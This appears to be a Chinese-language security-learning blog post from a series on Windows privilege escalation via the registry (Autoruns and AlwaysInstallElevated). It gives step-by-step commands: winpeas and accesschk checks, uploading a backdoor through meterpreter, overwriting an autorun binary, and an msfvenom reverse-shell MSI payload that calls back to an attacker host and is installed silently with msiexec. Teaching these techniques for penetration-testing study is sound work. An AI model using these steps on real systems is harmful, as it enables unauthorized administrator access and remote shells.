Day36 - Windows 提权(7)-提权手法统整 Registry 相关

资安这条路：领航新手的 Web Security 指南，以自建漏洞环境学习网站安全（iT邦帮忙铁人赛系列书）终於出书了，大家有空可以参考看看我的作品，现在天珑加入 Line 好友可以得到 100元折价券。

Registry

可以透过注册表中设定开机後自动启动的程序，并利用这些程序进行提权；或是如果注册表中 AlwaysInstallElevated 值为 1 可以利用安装 .msi 格式的安装程序档进行安装，并透过当下常是安装的使用者权限执行，透过 AlwaysInstallElevated 的设定可以允许一般使用者透过提升权限成 Admin 来安装程序。

Autoruns

step1: 利用 winpeas 确认有问题的注册表路径
透过 winpeas winpeas.exe quiet applicationsinfo 可以在结果中找到 Autorun Application 发现可利用的开机自动启动的程序路径 Folder 以及档案的权限 FilePerms 和注册表的路径 RegPath。

step2:确认注册表的内容
reg query 注册表路径

step3:可以透过 accesschk 确认执行档案的权限
.\accesschk.exe /accepteula -wvu "档案路径"
如果发现 RW Everyone FILE_ALL_ACCESS 找到可以修改的程序

step4:上传後门
meterpreter > upload "攻击机恶意档案路径" "目标系统路径"

step5:更换指定的路径档案
copy /Y 恶意程序路径 "原档案路径"

step6:提权限制
自动启动程序的权限，以最後一次登入者的权限，如果上一次登入为管理者权限，才可以提权。

AlwaysInstallElevated

SETP 1:需要满足 AlwaysInstallElevated 需求
确认目标系统是否有设定注册表 AlwaysInstallElevated 为 1
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

透过 winpeas winpeas.exe quiet windowscreds 可以在结果中找到 Checking AlwaysInstallElevater 发现 AlwaysInstallElevated 可以被利用。

两个注册表都需要启动 AlwaysInstallElevated 才有效果，以针对 Active Directory 的使用者才会有该值，可透过 Group Policy Object (GPO) 进行设定。

step 2:构造後门
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.110.3 LPORT=53 -f msi -o reverse.msi

step 3:开启监听，并透过安装软件来提升权限
msiexec /quiet /qn /i C:\Temp\恶意档案.msi